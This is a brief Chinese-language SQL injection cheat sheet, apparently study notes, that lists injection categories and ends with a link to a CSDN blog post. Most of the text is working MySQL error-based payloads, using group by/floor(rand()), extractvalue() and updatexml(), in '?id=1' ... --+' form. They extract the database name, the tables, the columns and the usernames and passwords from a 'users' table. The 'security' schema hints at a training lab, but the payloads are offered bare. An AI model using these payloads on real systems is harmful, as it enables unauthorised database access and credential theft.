联合查询注入:union selest 报错注入: group by(重复键冲) ?id=1' and (select 1 from (select count(*),concat((select 查询的内容 from information_schema.tables limit 0,1),floor(rand()*2))x from information_schema.tables group by x)a) --+ extractvalue() 函数 ?id=1' and extractvalue(1,concat('^',(select database()),'^')) --+ updatexml() 函数 获取数据库名字?id=1' and updatexml(1,concat('^',(database()),'^'),1) --+ 获取当前数据库中表的名字?id=1' and updatexml(1,concat('^',(select table_name from information_schema.tables where table_schema='security' ),'^'),1) --+ 爆表中的字段?id=1' and updatexml(1,concat('^',(select column_name from information_schema.columns where table_name='users' and table_schema='security' limit 0,1 ),'^'),1) --+ 爆字段中的内容?id=1' and updatexml(1,concat('^',(select group_concat(username,"--",password) from users limit 0,1 ),'^'),1) --+ 布尔盲注 时间盲注 多语句查询注入: https://blog.csdn.net/qq_44159028/article/details/114325805